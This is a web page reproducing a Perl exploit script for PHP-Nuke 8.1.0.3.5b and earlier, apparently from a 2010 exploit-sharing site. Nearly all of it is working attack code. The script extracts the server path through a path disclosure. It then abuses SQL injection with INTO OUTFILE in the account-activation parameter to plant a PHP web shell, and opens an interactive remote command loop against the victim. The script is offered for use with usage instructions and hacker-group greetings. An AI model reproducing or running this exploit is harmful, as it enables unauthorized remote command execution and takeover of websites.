PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit
=======================================================
# PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit
# Author/s: Dante90 & yawn
# Contact Us: www.unitx.net
# Requirements: magic_quotes_gpc : off
# Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net
# You will remember, Watson, how the dreadful business of the
# Abernetty family was first brought to my notice by the depth which the
# parsley had sunk into the butter upon a hot day.
# — Sherlock Holmes
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
sub Nuke::Usage {
print " n [0-Day] PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploitn";
print " —————————————————— n";
print " * USAGE: *n";
print " * cd [Local Disk]:\ *n";
print " * perl name_exploit.pl [host] [username] [password] *n";
print " * -> REMEMBER TO ADD THE FINAL / TO THE HOSTNAME <- *n";
print " —————————————————— n";
print " * Powered By Dante90 & yawn *n";
print " * www.unitx.net *n";
print " —————————————————— n";
}
#VARS
system $^O eq ‘MSWin32′ ? ‘cls’ : ‘clear’;
Nuke::Usage();
my $host = shift || die;
my $cmd;
my $shell = "<?php echo system($_GET["cmd"]); ?>"; # Change Here to Set your custom shell (for example use system() );
my $cookies = HTTP::Cookies->new;
my $request = LWP::UserAgent->new;
$request->agent("Mozilla 5/0");
$request->cookie_jar($cookies);
#END VARS
sub Full_Path_Disclosure() {
my $Get = $request->get($host.’themes/NukeNews/theme.php’);
if ($Get->content =~ /No such file or directory in <b>(.+?)</b> on line/i) {
return $1;
} else {
return "failed";
}
}
print " * Getting Full Pathn";
my $path = Full_Path_Disclosure();
die " * Failed Path Extraction" if ($path eq "failed");
$path =~ s/themes(/|\)NukeNews(/|\)theme.php//g;
print " * Full Path Found: $pathn";
if ($path =~ m/\/) {
$path =~ s/\/\\\\/g;
}
print " * Injecting Shell To $hostn";
my $req2= $request->post($host."modules.php?name=Your_Account&op=activate&username=WTF",
{
check_num => "’UNION/**/SELECT 1,2,3,4,5,6,’".$shell."’ FROM `nuke_authors` INTO OUTFILE ‘$path"."rce.php",
},
Referer => $host."index.php");
print " * Injecting Successfully Completedn";
print " * Shell now available on $host"."rce.phpn";
print " * Connecting to remote shelln";
sleep(4);
print " * Connected.. Type "quit" to quitn";
while() {
print "* root@backdoor ~$ ";
$cmd = <>;
chomp($cmd);
last if $cmd eq "quit";
$req2 = $request->get($host."/rce.php?cmd=".$cmd);
print $req2->content."n";
}
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-10]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13274
Leave a Reply